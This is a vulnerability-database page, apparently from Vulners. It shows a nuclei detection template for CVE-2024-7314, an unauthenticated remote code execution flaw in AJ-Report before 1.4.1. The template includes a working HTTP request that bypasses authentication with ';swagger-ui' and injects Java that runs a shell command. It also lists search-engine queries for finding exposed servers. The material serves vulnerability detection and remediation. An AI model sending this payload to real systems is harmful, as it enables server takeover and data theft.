Lucene search
K

AJ-Report < 1.4.1 - Remote Code Execution

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 142 Views

AJ-Report before 1.4.1 has a critical remote code execution vulnerability via authentication bypass.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-7314
2 Aug 202419:52
circl
CNNVD
AJ-Report 安全漏洞
2 Aug 202400:00
cnnvd
CVE
CVE-2024-7314
2 Aug 202416:33
cve
Cvelist
CVE-2024-7314 anji-plus AJ-Report Authentication Bypass
2 Aug 202416:33
cvelist
NVD
CVE-2024-7314
2 Aug 202417:16
nvd
OSV
CVE-2024-7314
2 Aug 202417:16
osv
Positive Technologies
PT-2024-38260 · Anji Plus · Anji-Plus Aj-Report
2 Aug 202400:00
ptsecurity
RedhatCVE
CVE-2024-7314
5 Feb 202512:00
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2024-7314
27 May 202500:00
vulncheck_kev
Vulnrichment
CVE-2024-7314 anji-plus AJ-Report Authentication Bypass
2 Aug 202416:33
vulnrichment
Rows per page
id: CVE-2024-7314

info:
  name: AJ-Report < 1.4.1 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.
  impact: |
    Unauthenticated attackers can bypass authentication and execute arbitrary Java code on the server through script engine injection, achieving complete system compromise and access to all application data.
  remediation: |
    Upgrade to AJ-Report version 1.4.1 or later which includes security fixes.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/aj-report/CNVD-2024-15077
    - https://github.com/yuebusao/AJ-REPORT-EXPLOIT
    - https://xz.aliyun.com/t/14460
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-280
    epss-score: 0.51468
    epss-percentile: 0.98807
    cve-id: CVE-2024-7314
    cpe: cpe:2.3:a:anji-plus:report:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: anji-plus
    product: report
    fofa-query: app="AJ-Report"
    shodan-query: http.title:"AJ-Report"
  tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev,vuln

http:
  - raw:
      - |
        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - 'data":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
# digest: 4b0a00483046022100dafcb1653ae9106cfa03f311490a10b44ff13dde20e7dc9094590d2913629588022100d2fc03c36242e5930b8af9d35ff532d0e415f2900042c47eaa3b93f7d86cc727:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.8
EPSS0.51468
SSVC
142